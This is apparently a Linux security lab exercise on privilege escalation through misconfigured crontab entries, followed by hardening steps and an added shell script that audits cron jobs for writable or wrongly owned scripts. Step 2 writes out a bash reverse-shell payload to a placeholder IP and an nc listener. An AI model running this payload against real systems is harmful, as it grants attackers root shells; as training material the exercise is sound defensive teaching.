Exercise 37: Privilege Escalation Using Crontab Misconfigurations

Jul 7, 2025

Objective: Exploit misconfigured crontab files to escalate privileges on a Linux system, and learn how to secure crontab configurations.


Scenario: Crontab is used to schedule tasks on Linux systems. Misconfigured crontab files, such as those with world-writable permissions or insecurely executable scripts, can be exploited to execute malicious code with elevated privileges. Your task is to identify and exploit such misconfigurations and secure crontab files to prevent unauthorized access.


Lab Setup

  1. Environment:
    • A Linux system with a user crontab and system crontab entries.
  2. Tools Required:
    • Terminal access with non-root and root privileges.

Lab Steps

Step 1: Identify Misconfigured Crontab Files

  1. List the current user’s crontab entries:
       crontab -l
  2. Check system-wide crontab entries:
       cat /etc/crontab
       ls -l /etc/cron.*
  3. Identify writable or insecurely configured cron jobs:
       find / -type f -perm -0002 -name "*cron*" 2>/dev/null

Step 2: Exploit Writable Cron Jobs

  1. Locate a writable script or command in a cron job:
    • Example crontab entry: * * * * * root /tmp/vulnerable.sh
  2. Modify the vulnerable script to include malicious code:
       echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > /tmp/vulnerable.sh
       chmod +x /tmp/vulnerable.sh
  3. Set up a listener on your attack machine:
       nc -lvnp 4444
  4. Wait for the cron job to execute and establish a reverse shell connection.

Step 3: Test Privilege Escalation

  1. Verify elevated privileges after the reverse shell connects:
       whoami
  2. Document the steps used to exploit the misconfiguration.

Solution

Explanation:

  • Misconfigured cron jobs with writable files allow attackers to modify scripts executed by root or other privileged users.

Prevention:

  1. Restrict File Permissions:
    • Ensure cron scripts are not writable by non-privileged users:
        chmod 700 /path/to/script.sh
        chown root:root /path/to/script.sh
  2. Audit Crontab Entries:
    • Regularly review and secure user and system crontab entries:
        crontab -u <username> -l
        cat /etc/crontab
  3. Log Cron Activity:
    • Enable cron job logging for monitoring:
        echo 'cron.* /var/log/cron.log' >> /etc/rsyslog.conf
        systemctl restart rsyslog
  4. Restrict Cron Access:
    • Use /etc/cron.allow and /etc/cron.deny to control user access:
        echo '<username>' > /etc/cron.allow
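
An audit for the misconfiguration described above, as an added example that is not part of the original exercise: it reads a file in /etc/crontab format and flags jobs whose script is group- or world-writable, or owned by an account other than root or the user the job runs as. The function names, the output labels and the sample entries built by demo are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original exercise): audit a file in /etc/crontab
# format for jobs whose scripts a less-privileged user could modify.
# Prints one line per finding; exit status is 1 if anything was flagged.
audit_crontab() (
    set -f                                  # keep '*' in commands from glob-expanding
    rc=0
    while read -r m h dom mon dow user cmd || [ -n "$m" ]; do
        case $m in
            ''|'#'*|*=*) continue ;;        # blank line, comment, VAR=value
            @*) cmd="$dom $mon $dow $user $cmd"; user=$h ;;   # "@reboot user cmd"
        esac
        for word in $cmd; do
            case $word in /*) ;; *) continue ;; esac          # absolute paths only
            [ -f "$word" ] || continue                        # existing regular files only
            # Group- or world-writable: others can replace what the job runs.
            if [ -n "$(find "$word" -prune \( -perm -020 -o -perm -002 \))" ]; then
                echo "WRITABLE runs-as=$user $word"; rc=1
            fi
            # Owned by someone other than root or the account the job runs as.
            owner=$(ls -ld "$word" | awk '{print $3}')
            if [ "$owner" != root ] && [ "$owner" != "$user" ]; then
                echo "OWNER runs-as=$user owner=$owner $word"; rc=1
            fi
        done
    done < "$1"
    exit "$rc"
)

# Constructed sample: one job runs a mode-777 script, the other a mode-700 one.
demo() {
    d=$(mktemp -d); me=$(ls -ld "$d" | awk '{print $3}')
    printf '#!/bin/sh\n' > "$d/vulnerable.sh"; chmod 777 "$d/vulnerable.sh"
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 700 "$d/backup.sh"
    printf '%s\n' 'SHELL=/bin/sh' '# constructed entries' \
        "* * * * * $me $d/vulnerable.sh" \
        "0 3 * * * $me $d/backup.sh >/dev/null 2>&1" > "$d/crontab"
    audit_crontab "$d/crontab" && st=0 || st=$?
    rm -rf "$d"
    return "$st"
}
```

Run audit_crontab against /etc/crontab and each file under /etc/cron.d as root. Per-user crontabs listed with crontab -l have no user column, so the user field would have to be dropped from the read for those.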

Testing and Verification

  1. Attempt to modify cron job scripts after applying strict permissions to confirm they are secure.
  2. Verify that unauthorized users cannot create or modify cron jobs.
  3. Monitor cron logs for suspicious activity.

Reflection

This exercise demonstrates the risks posed by misconfigured crontab files and highlights the importance of securing scheduled tasks. By identifying and mitigating these vulnerabilities, you’ve gained insights into protecting Linux systems from privilege escalation attacks.
